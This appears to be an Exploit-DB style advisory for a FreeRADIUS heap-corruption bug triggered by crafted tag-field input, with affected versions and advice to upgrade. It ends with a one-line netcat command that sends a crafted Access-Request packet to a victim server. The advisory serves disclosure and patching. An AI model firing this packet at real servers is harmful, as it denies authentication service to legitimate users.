FreeRADIUS Heap-Corruption Vulnerability

vendor:

FreeRADIUS

by:

SecurityFocus

7.5

CVSS

HIGH

Heap-Corruption

119

CWE

Product Name: FreeRADIUS

Affected Version From: 0.4.0

Affected Version To: 0.9.2 and 1.1.3 through 1.1.7

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2003

FreeRADIUS Heap-Corruption Vulnerability

FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server. This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.

Mitigation:

Upgrade to the latest version of FreeRADIUS.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9079/info

FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.

This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.

This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.

UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.

bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>